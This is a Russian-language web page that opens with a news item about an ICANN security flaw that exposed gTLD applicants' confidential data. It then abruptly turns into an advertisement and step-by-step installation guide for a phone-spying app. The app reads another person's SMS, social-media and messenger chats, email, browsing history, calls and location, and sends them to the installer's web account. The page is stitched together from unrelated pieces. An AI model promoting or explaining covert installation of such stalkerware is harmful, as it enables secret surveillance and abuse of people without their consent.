Найдены новые уязвимости в сетях ICANN

c71856608ce0f0649d07a31e2a89e204Обнаруженная уязвимость не требует от пользователя каких-то определённых знаний в области взлома, а может использоваться совершенно случайно. Найденная уязвимость позволяет раскрывать различные конфиденциальные данные о конкурирующих организациях, поскольку информация оказывалась опубликованной в свободном доступе.

Причина кроется в ошибке безопасности, выявленной в собственных сетях ICANN. Данные становились доступными пользователю в тот момент, когда он решает приобрести какой-то домен, формируя запросы о разных адресах. Если адрес занят – на экране появляется различная информация, в том числе и запрещенная к свободному распространению.

Также сообщается и о том, что участие в gTLD-аукционах потенциально открывает доступ к информации о компании, а у конкурентов появляется возможность откровенно следить друг за другом. Специалисты в области IT уже сейчас стараются предпринять необходимые меры для того, чтобы решить данную проблему. Поскольку в ближайшем будущем планируется существенно расширить размеры Всемирной паутины, добавив целый ряд доменов верхнего уровня, потребовалось ввести определённые ограничения. В настоящее время сотрудники ICANN официально приостановили те сервисы, в которых была выявлена подобная уязвимость.

Аутентификация проходит относительно корректно, но обстоятельства могут сложиться таким образом, что пользователь сможет просматривать данные о других участниках системы. Об этом сообщается в официальном блоге ICANN. Упомянутые обстоятельства не уточняются, чтобы не давать хакерам возможность воспользоваться ими.

Регистратор отмечает, что в информации, которая может стать достоянием третьих лиц, содержатся регистрационные заметки, а также адреса DNS, контактные сведения, ряд коммерческих данных, включая и коммерческую тайну. Пока к ICANN никто с претензиями не обращался, однако ранее ряд специалистов по безопасности уже выступали с критическими заявлениями в адрес этой организации. Основная претензия – плохо отлаженная безопасность системы, не смотря на полное доминирование в данном сегменте Интернета.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.